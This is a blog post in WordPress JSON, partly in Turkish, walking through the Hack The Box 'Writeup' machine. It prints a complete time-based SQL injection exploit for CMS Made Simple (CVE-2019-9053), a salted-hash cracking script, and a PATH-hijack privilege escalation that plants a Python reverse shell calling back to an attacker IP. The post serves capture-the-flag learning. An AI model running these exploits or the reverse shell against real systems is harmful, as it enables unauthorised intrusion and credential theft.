{"id":1581,"date":"2021-10-04T22:46:28","date_gmt":"2021-10-04T22:46:28","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1581"},"modified":"2021-10-04T22:46:28","modified_gmt":"2021-10-04T22:46:28","slug":"writeup","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/10\/04\/writeup\/","title":{"rendered":"Writeup"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Difficulty<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/192\" title=\"Writeup\">Writeup<\/a> - HTB<\/td>\n<td>Medium<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/ca06c447787b38ec940eb55d5c54b14c.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap scan:<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nmap -p- -A -T4 10.10.10.138\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-10-03 18:36 EDT\nStats: 0:01:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan\nSYN Stealth Scan Timing: About 96.12% done; ETC: 18:37 (0:00:04 remaining)\nStats: 0:01:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 93.14% done; ETC: 18:37 (0:00:00 remaining)\nNmap scan report for 10.10.10.138\nHost is up (0.069s latency).
\nNot shown: 65533 filtered ports\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)\n| ssh-hostkey:\n|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)\n|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)\n|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)\n80\/tcp open  http    Apache httpd 2.4.25 ((Debian))\n| http-robots.txt: 1 disallowed entry\n|_\/writeup\/\n|_http-server-header: Apache\/2.4.25 (Debian)\n|_http-title: Nothing here yet.\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 4.8 (92%)\nNo exact OS matches for host (test conditions non-ideal).
\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 22\/tcp)\nHOP RTT      ADDRESS\n1   68.76 ms 10.10.14.1\n2   68.83 ms 10.10.10.138\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 112.78 seconds<\/code><\/pre>\n<p>When I saw port 80 open I was going to start scanning it, but I noticed that after certain scanning activity the port gets closed. The service goes down for a while and then comes back up. This is bad, because it means I cannot use tools like dirb or gobuster. I then visited the page in the browser. It states that a DDoS protection product is in use: when 40* errors are received it treats this as a DDoS and stops the service for a period of time. So first I pulled all the words from the page and built a wordlist.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138]\n\u2514\u2500# cewl --lowercase --with-numbers -d 3 http:\/\/10.10.10.138\/ -w wordlist<\/code><\/pre>\n<p>After that I wrote a Python script.
When the server was shut down because of the 404s, this script waited for a set period and then resumed the directory discovery. My code is given below.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138]\n\u2514\u2500# cat exploit\/dirbb.py    130 \u2a2f\nimport requests\nimport time\n\n# wordlist built with cewl, one candidate path per line\npath = input(&quot;Dosya ad\u0131:\\r\\n&quot;)\ndosya = open(path)\nwordlist = dosya.read().split(&quot;\\n&quot;)\ndosya.close()\n\ndizi200 = []  # paths that answered 200\nurl = &quot;http:\/\/10.10.10.138\/&quot;\nsayac = 0\nfor i in wordlist:\n        sayac = sayac + 1\n        try:\n                r = requests.get(url+i)\n                # status_code is an int, so compare with 200, not the string &quot;200&quot;\n                if(r.status_code == 200):\n                        dizi200.append(url+i)\n                url_ = url + i\n                print(url_,r.status_code)\n        except requests.exceptions.RequestException:\n                # connection refused: the DDoS filter has cut the service, wait for it to come back\n                print(&quot;ddos script&#039;e yakaland\u0131, bekleniyor!&quot;)\n                time.sleep(60)\n        # throttle: pause after every 5 requests and show the hits so far\n        if(sayac == 5):\n                time.sleep(10)\n                sayac = 0\n                print(&quot;---------------&quot;)\n                for ii in dizi200:\n                        print(ii)\n                print(&quot;---------------&quot;)<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138]\n\u2514\u2500# python3 exploit\/dirbb.py\n...\n...\nhttp:\/\/10.10.10.138\/apache 404\nhttp:\/\/10.10.10.138\/40x 404
\nhttp:\/\/10.10.10.138\/errors 404\nhttp:\/\/10.10.10.138\/bans 404\n---------------\n---------------\nddos script&#039;e yakaland\u0131, bekleniyor!\nddos script&#039;e yakaland\u0131, bekleniyor!\nhttp:\/\/10.10.10.138\/hope 404\nhttp:\/\/10.10.10.138\/get 404\nhttp:\/\/10.10.10.138\/hit 404\n---------------\n---------------\nhttp:\/\/10.10.10.138\/false 404\nhttp:\/\/10.10.10.138\/positive 404\nhttp:\/\/10.10.10.138\/drops 404\nhttp:\/\/10.10.10.138\/where 404\nhttp:\/\/10.10.10.138\/download 404\n---------------\n---------------\nhttp:\/\/10.10.10.138\/the 404\nhttp:\/\/10.10.10.138\/proper 404\nhttp:\/\/10.10.10.138\/donkey 404\nhttp:\/\/10.10.10.138\/please 404\nhttp:\/\/10.10.10.138\/let 404\n---------------\n---------------\nhttp:\/\/10.10.10.138\/via 404\nhttp:\/\/10.10.10.138\/mail 404
\nhttp:\/\/10.10.10.138\/jkr 404\nhttp:\/\/10.10.10.138\/writeup 200<\/code><\/pre>\n<p>I got a 200 status code at <strong><a href=\"http:\/\/10.10.10.138\/writeup\">http:\/\/10.10.10.138\/writeup<\/a><\/strong>. When I visited the page and went through its source, I saw the string <strong>CMS Made Simple<\/strong> in the header section. So I searched for a published exploit for it.<\/p>\n<pre><code class=\"language-sh\">\n\u2514\u2500# searchsploit CMS Made Simple\n-------------------------------------------------------------------------------------------------------------\n Exploit Title | Path\n-------------------------------------------------------------------------------------------------------------\nCMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) | php\/remote\/46627.rb\nCMS Made Simple 0.10 - &#039;index.php&#039; Cross-Site Scripting | php\/webapps\/26298.txt\nCMS Made Simple 0.10 - &#039;Lang.php&#039; Remote File Inclusion | php\/webapps\/26217.html\nCMS Made Simple 1.0.2 - &#039;SearchInput&#039; Cross-Site Scripting | php\/webapps\/29272.txt\nCMS Made Simple 1.0.5 - &#039;Stylesheet.php&#039; SQL Injection | php\/webapps\/29941.txt\nCMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities | php\/webapps\/32668.txt\nCMS Made Simple 1.11.9 - Multiple Vulnerabilities | php\/webapps\/43889.txt\nCMS Made Simple 1.2 - Remote Code Execution | php\/webapps\/4442.txt\nCMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php\/webapps\/4810.txt\nCMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload | php\/webapps\/5600.php\nCMS Made Simple 1.4.1 - Local File Inclusion | php\/webapps\/7285.txt\nCMS Made Simple 1.6.2 - Local File Disclosure | php\/webapps\/9407.txt\nCMS Made Simple 1.6.6 - Local File Inclusion \/ Cross-Site Scripting | php\/webapps\/33643.txt\nCMS Made Simple 1.6.6 - Multiple Vulnerabilities | php\/webapps\/11424.txt\nCMS Made Simple 1.7 - Cross-Site Request Forgery | php\/webapps\/12009.html\nCMS Made Simple 1.8 - &#039;default_cms_lang&#039; Local File Inclusion | php\/webapps\/34299.py\nCMS Made Simple 1.x - Cross-Site Scripting \/ Cross-Site Request Forgery | php\/webapps\/34068.html\nCMS Made Simple 2.1.6 - &#039;cntnt01detailtemplate&#039; Server-Side Template Injection | php\/webapps\/48944.py\nCMS Made Simple 2.1.6 - Multiple Vulnerabilities | php\/webapps\/41997.txt\nCMS Made Simple 2.1.6 - Remote Code Execution | php\/webapps\/44192.txt\nCMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php\/webapps\/48779.py\nCMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php\/webapps\/48742.txt\nCMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php\/webapps\/48851.txt\nCMS Made Simple 2.2.15 - &#039;title&#039; Cross-Site Scripting (XSS) | php\/webapps\/49793.txt\nCMS Made Simple 2.2.15 - RCE (Authenticated) | php\/webapps\/49345.txt\nCMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) | php\/webapps\/49199.txt\nCMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php\/webapps\/44976.py\nCMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php\/webapps\/45793.py\nCMS Made Simple &lt; 1.12.1 \/ &lt; 2.1.3 - Web Server Cache Poisoning | php\/webapps\/39760.txt\nCMS Made Simple &lt; 2.2.10 - SQL Injection | php\/webapps\/46635.py\nCMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload | php\/webapps\/34300.py\nCMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload | php\/webapps\/34298.py\nCMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload | php\/webapps\/46546.py\n-------------------------------------------------------------------------------------------------------------\nShellcodes: No Results\nPapers: No Results\n<\/code><\/pre>\n<p>I found the SQL injection exploit, but I had to edit the Python file. It was written for Python 2, and the program crashed while cracking the password. 
The edited version is given below.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138\/exploit]\n\u2514\u2500# cat 46635.py\n#!\/usr\/bin\/env python\n# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple &lt;= 2.2.9\n# Date: 30-03-2019\n# Exploit Author: Daniele Scanu @ Certimeter Group\n# Vendor Homepage: https:\/\/www.cmsmadesimple.org\/\n# Software Link: https:\/\/www.cmsmadesimple.org\/downloads\/cmsms\/\n# Version: &lt;= 2.2.9\n# Tested on: Ubuntu 18.04 LTS\n# CVE : CVE-2019-9053\n\nimport requests\nfrom termcolor import colored\nimport time\nfrom termcolor import cprint\nimport optparse\nimport hashlib\n\nparser = optparse.OptionParser()\nparser.add_option(&#039;-u&#039;, &#039;--url&#039;, action=&quot;store&quot;, dest=&quot;url&quot;, help=&quot;Base target uri (ex. http:\/\/10.10.10.100\/cms)&quot;)\nparser.add_option(&#039;-w&#039;, &#039;--wordlist&#039;, action=&quot;store&quot;, dest=&quot;wordlist&quot;, help=&quot;Wordlist for crack admin password&quot;)\nparser.add_option(&#039;-c&#039;, &#039;--crack&#039;, action=&quot;store_true&quot;, dest=&quot;cracking&quot;, help=&quot;Crack password with wordlist&quot;, default=False)\n\noptions, args = parser.parse_args()\nif not options.url:\n    print(&quot;[+] Specify an url target&quot;)\n    print(&quot;[+] Example usage (no cracking password): exploit.py -u http:\/\/target-uri&quot;)\n    print(&quot;[+] Example usage (with cracking password): exploit.py -u http:\/\/target-uri --crack -w \/path-wordlist&quot;)\n    print(&quot;[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.&quot;)\n    exit()\n\nurl_vuln = options.url + &#039;\/moduleinterface.php?mact=News,m1_,default,0&#039;\nsession = requests.Session()\ndictionary = &#039;1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$&#039;\nflag = True\npassword = &quot;&quot;\ntemp_password = &quot;&quot;\nTIME = 1\ndb_name = &quot;&quot;\noutput = &quot;&quot;\nemail = &quot;&quot;\n\nsalt = &#039;&#039;\nwordlist = &quot;&quot;\nif options.wordlist:\n    wordlist += options.wordlist\n\ndef crack_password():\n    global password\n    global output\n    global wordlist\n    global salt\n    dict = open(wordlist, encoding=&#039;latin-1&#039;)\n    for line in dict.readlines():\n        line = line.replace(&quot;\\n&quot;, &quot;&quot;)\n        beautify_print_try(line)\n        if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:\n            output += &quot;\\n[+] Password cracked: &quot; + line\n            break\n    dict.close()\n\ndef beautify_print_try(value):\n    global output\n    print(&quot;\\033c&quot;)\n    cprint(output,&#039;green&#039;, attrs=[&#039;bold&#039;])\n    cprint(&#039;[*] Try: &#039; + value, &#039;red&#039;, attrs=[&#039;bold&#039;])\n\ndef beautify_print():\n    global output\n    print(&quot;\\033c&quot;)\n    cprint(output,&#039;green&#039;, attrs=[&#039;bold&#039;])\n\ndef dump_salt():\n    global flag\n    global salt\n    global output\n    ord_salt = &quot;&quot;\n    ord_salt_temp = &quot;&quot;
                                                                 \n    while flag:                                                                                                                                                                               \n        flag = False                                                                                                                                                                          \n        for i in range(0, len(dictionary)):                                                                                                                                                   \n            temp_salt = salt + dictionary[i]                                                                                                                                                  \n            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]                                                                                                                            \n            beautify_print_try(temp_salt)                                                                                                                                                     \n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_siteprefs+where+sitepref_value+like+0x&quot; + ord_salt_temp + &quot;25+and+sitepref_name+like+0x736974656d61736b)+--+&quot;  \n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload                                                                                                                                          \n            start_time = time.time()                                                                                                                                                          \n            r = session.get(url)                                                                                                                                 
                             \n            elapsed_time = time.time() - start_time                                                                                                                                           \n            if elapsed_time &gt;= TIME:                                                                                                                                                          \n                flag = True                                                                                                                                                                   \n                break                                                                                                                                                                         \n        if flag:                                                                                                                                                                              \n            salt = temp_salt                                                                                                                                                                  \n            ord_salt = ord_salt_temp                                                                                                                                                          \n    flag = True                                                                                                                                                                               \n    output += &#039;\\n[+] Salt for password found: &#039; + salt                                                                                                                                        \n\ndef dump_password():                                                                                                                                                                          \n    global flag                  
                                                                                                                                                             \n    global password                                                                                                                                                                           \n    global output                                                                                                                                                                             \n    ord_password = &quot;&quot;                                                                                                                                                                         \n    ord_password_temp = &quot;&quot;                                                                                                                                                                    \n    while flag:                                                                                                                                                                               \n        flag = False     \n        for i in range(0, len(dictionary)):                                                                                                                                           [41\/205]\n            temp_password = password + dictionary[i]                                                                                                                                          \n            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]                                                                                                                    \n            beautify_print_try(temp_password)                                                                                                                                                 \n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + 
str(TIME) + &quot;)+from+cms_users&quot;                                                                                                         \n            payload += &quot;+where+password+like+0x&quot; + ord_password_temp + &quot;25+and+user_id+like+0x31)+--+&quot;                                                                                        \n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload                                                                                                                                          \n            start_time = time.time()                                                                                                                                                          \n            r = session.get(url)                                                                                                                                                              \n            elapsed_time = time.time() - start_time                                                                                                                                           \n            if elapsed_time &gt;= TIME:                                                                                                                                                          \n                flag = True                                                                                                                                                                   \n                break                                                                                                                                                                         \n        if flag:                                                                                                                                                                              \n            password = temp_password                                                    
                                                                                                      \n            ord_password = ord_password_temp                                                                                                                                                  \n    flag = True                                                                                                                                                                               \n    output += &#039;\\n[+] Password found: &#039; + password                                                                                                                                             \n\ndef dump_username():                                                                                                                                                                          \n    global flag                                                                                                                                                                               \n    global db_name                                                                                                                                                                            \n    global output                                                                                                                                                                             \n    ord_db_name = &quot;&quot;                                                                                                                                                                          \n    ord_db_name_temp = &quot;&quot;                                                                                                                                                                     \n    while flag:                                                                                                                        
                                                       \n        flag = False                                                                                                                                                                          \n        for i in range(0, len(dictionary)):                                                                                                                                                   \n            temp_db_name = db_name + dictionary[i]                                                                                                                                            \n            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]                                                                                                                      \n            beautify_print_try(temp_db_name)                                                                                                                                                  \n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_users+where+username+like+0x&quot; + ord_db_name_temp + &quot;25+and+user_id+like+0x31)+--+&quot;                             \n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload                                                                                                                                          \n            start_time = time.time()                                                                                                                                                          \n            r = session.get(url)                                                                                                                                                              \n            elapsed_time = time.time() - start_time                                                                                                                        
                   \n            if elapsed_time &gt;= TIME:                                                                                                                                                          \n                flag = True                                                                                                                                                                   \n                break                                                                                                                                                                         \n        if flag:                                                                                                                                                                              \n            db_name = temp_db_name         \n            ord_db_name = ord_db_name_temp\n    output += &#039;\\n[+] Username found: &#039; + db_name\n    flag = True\n\ndef dump_email():\n    global flag\n    global email\n    global output\n    ord_email = &quot;&quot;\n    ord_email_temp = &quot;&quot;\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_email = email + dictionary[i]\n            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_email)\n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_users+where+email+like+0x&quot; + ord_email_temp + &quot;25+and+user_id+like+0x31)+--+&quot;\n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time &gt;= TIME:\n                flag = True\n                break\n        if flag:\n            email = temp_email\n            ord_email = ord_email_temp\n    output += &#039;\\n[+] Email found: &#039; + email\n    flag = 
True\n\ndump_salt()\ndump_username()\ndump_email()\ndump_password()\n\nif options.cracking:\n    print(colored(&quot;[*] Now try to crack password&quot;))\n    crack_password()\n\nbeautify_print()\n<\/code><\/pre>\n<p>Kodu \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131mda a\u015fa\u011f\u0131daki \u00e7\u0131kt\u0131lar\u0131 ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n#[+] Salt for password found: 5a599ef579066807\n#[+] Username found: jkr\n#[+] Email found: jkr@writeup.htb\n#[+] Password found: 62def4866937f08cc13bab43bb14e6f7<\/code><\/pre>\n<p>Daha sonras\u0131nda kodun i\u00e7erisindeki hash'i k\u0131rma k\u0131sm\u0131n\u0131 ayr\u0131 bir python koduna kaydettim ve k\u0131rma i\u015flemini kendim yapt\u0131m. Python kodu a\u015fa\u011f\u0131da verilmi\u015ftir.<\/p>\n<pre><code class=\"language-sh\">import hashlib\ndef crack_password():\n    password = &quot;62def4866937f08cc13bab43bb14e6f7&quot;\n    wordlist = &quot;\/usr\/share\/wordlists\/rockyou.txt&quot;\n    salt = &quot;5a599ef579066807&quot;\n    dict = open(wordlist, encoding=&quot;latin-1&quot;)\n    for line in dict.readlines():\n        line = line.replace(&quot;\\n&quot;, &quot;&quot;)\n#        beautify_print_try(line)\n        if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:\n            print(&quot;\\n[+] Password cracked: &quot; + line)\n            break\n    dict.close()\n\ncrack_password()<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138\/exploit]                                                       \n\u2514\u2500# python3 crack.py\n\n[+] Password cracked: raykayjay9<\/code><\/pre>\n<p>Ssh ile ba\u011flant\u0131 yapt\u0131\u011f\u0131mda user flag'i okudum.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ssh jkr@10.10.10.138                   \njkr@10.10.10.138&#039;s password: \nLinux writeup 4.9.0-8-amd64 x86_64 GNU\/Linux\n\nThe 
programs included with the Devuan GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDevuan GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\njkr@writeup:~$ pwd\n\/home\/jkr\njkr@writeup:~$ ls\nuser.txt\njkr@writeup:~$ cat user.txt\n846446f10caff03660d3ef24705e13ec\njkr@writeup:~$ \n<\/code><\/pre>\n<p>\u0130\u00e7eride bir tak\u0131m kontroller ger\u00e7ekle\u015ftirdim ki bana g\u00f6re python k\u00fct\u00fcphanlerini kullanarak root olmam\u0131z laz\u0131m ancak ba\u015far\u0131l\u0131 olmad\u0131. Bunun sebebini ger\u00e7ekten anlam\u015f de\u011filim. Neyse...<\/p>\n<p>Makineye pspy arac\u0131n\u0131 att\u0131m ve processleri g\u00f6r\u00fcnt\u00fclemeye ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\njkr@writeup:\/tmp$ wget http:\/\/10.10.14.21\/pspy32s\n--2021-10-04 18:38:52--  http:\/\/10.10.14.21\/pspy32s\nConnecting to 10.10.14.21:80... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 1090528 (1.0M) [application\/octet-stream]\nSaving to: \u2018pspy32s\u2019\n\npspy32s                 100%[==============================&gt;]   1.04M   559KB\/s    in 1.9s    \n\n2021-10-04 18:38:54 (559 KB\/s) - \u2018pspy32s\u2019 saved [1090528\/1090528]\n\njkr@writeup:\/tmp$ chmod 777 pspy32s\n<\/code><\/pre>\n<p>ssh ba\u011flant\u0131s\u0131 yapt\u0131\u011f\u0131mda olu\u015fan process'ler a\u015fa\u011f\u0131da verilmi\u015ftir..<\/p>\n<pre><code class=\"language-sh\">\n2021\/10\/04 18:40:01 CMD: UID=0    PID=2059   | \/usr\/sbin\/CRON \n2021\/10\/04 18:40:01 CMD: UID=0    PID=2060   | \/bin\/sh -c \/root\/bin\/cleanup.pl &gt;\/dev\/null 2&gt;&amp;1 \n2021\/10\/04 18:40:05 CMD: UID=0    PID=2061   | sshd: [accepted]\n2021\/10\/04 18:40:05 CMD: UID=0    PID=2062   | sshd: [accepted]  \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2063   | sshd: jkr [priv]  \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2064   | sh -c \/usr\/bin\/env -i PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin run-parts --lsbsysinit \/etc\/update-motd.d &gt; \/run\/motd.dynamic.new \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2065   | run-parts --lsbsysinit \/etc\/update-motd.d \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2066   | \/bin\/sh \/etc\/update-motd.d\/10-uname \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2067   | sshd: jkr [priv]  \n<\/code><\/pre>\n<p>G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere <strong>run-parts<\/strong> isimli program bir path belirtilmeden \u00e7al\u0131\u015ft\u0131r\u0131lm\u0131\u015f.<\/p>\n<p>PATH'e bakt\u0131\u011f\u0131m\u0131zda:<\/p>\n<pre><code class=\"language-sh\">\njkr@writeup:\/tmp$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games<\/code><\/pre>\n<p>Ayr\u0131ca yazailece\u011fimiz pathlere bakt\u0131\u011f\u0131m\u0131zda:<\/p>\n<pre><code class=\"language-sh\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Interesting GROUP writable files (not in Home) 
(max 500)\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#writable-files\n  Group jkr:\n\/tmp\/linpeas.sh\n  Group cdrom:\n\n  Group floppy:\n\n  Group audio:\n\n  Group dip:\n\n  Group video:\n\n  Group plugdev:\n\n  Group staff:\n\/var\/local\n\/usr\/local\n\/usr\/local\/bin\n\/usr\/local\/include\n\/usr\/local\/share\n\/usr\/local\/share\/sgml\n\/usr\/local\/share\/sgml\/misc\n\/usr\/local\/share\/sgml\/stylesheet\n\/usr\/local\/share\/sgml\/entities\n\/usr\/local\/share\/sgml\/dtd\n\/usr\/local\/share\/sgml\/declaration\n\/usr\/local\/share\/fonts\n\/usr\/local\/share\/ca-certificates\n\/usr\/local\/share\/man\n\/usr\/local\/share\/emacs\n\/usr\/local\/share\/emacs\/site-lisp\n\/usr\/local\/share\/xml\n\/usr\/local\/share\/xml\/schema\n\/usr\/local\/share\/xml\/misc\n\/usr\/local\/share\/xml\/entities\n\/usr\/local\/share\/xml\/declaration\n\/usr\/local\/games\n\/usr\/local\/lib\/python3.5\n\/usr\/local\/lib\/python3.5\/dist-packages\n\/usr\/local\/lib\/python2.7\n\/usr\/local\/lib\/python2.7\/dist-packages\n\/usr\/local\/lib\/python2.7\/site-packages\n\/usr\/local\/sbin<\/code><\/pre>\n<p>Path'i manip\u00fcle edebilece\u011fimzi g\u00f6rebiliyoruz. 
Bir reverse shell olu\u015fturup root olal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\njkr@writeup:\/tmp$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games\njkr@writeup:\/tmp$ cd \/usr\/local\/bin\njkr@writeup:\/usr\/local\/bin$ touch run-parts\njkr@writeup:\/usr\/local\/bin$ nano run-parts\njkr@writeup:\/usr\/local\/bin$ cat run-parts\npython -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.21&quot;,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/sh&quot;)&#039;\n\njkr@writeup:\/usr\/local\/bin$ chmod 777 run-parts\n<\/code><\/pre>\n<p>Makineye tekrardan ssh ile ba\u011flanmay\u0131 denedi\u011fimde:<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ssh jkr@10.10.10.138\njkr@10.10.10.138&#039;s password: \n<\/code><\/pre>\n<p>1324 portuma reverse geliyor.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# nc -lvp 1234\nlistening on [any] 1234 ...\nconnect to [10.10.14.21] from writeup.htb [10.10.10.138] 52400\n# id\nid\nuid=0(root) gid=0(root) groups=0(root)\n# cd \/root\ncd \/root\n# ls\nls\nbin  root.txt\n# cat root.txt\ncat root.txt\n5fd505e0c8af615cf7f6c36d60ee5276\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Writeup &#8211; HTB Orta Linux Walkthrough nmap taramas\u0131: \u250c\u2500\u2500(root&#x1f480;kali)-[~] \u2514\u2500# nmap -p- -A -T4 10.10.10.138 Starting Nmap 7.91 ( https:\/\/nmap.org&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/10\/04\/writeup\/\">Devam\u0131n\u0131 oku<span 
class=\"screen-reader-text\">Writeup<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1581","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1581","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1581"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1581\/revisions"}],"predecessor-version":[{"id":1583,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1581\/revisions\/1583"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1581"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1581"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1581"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}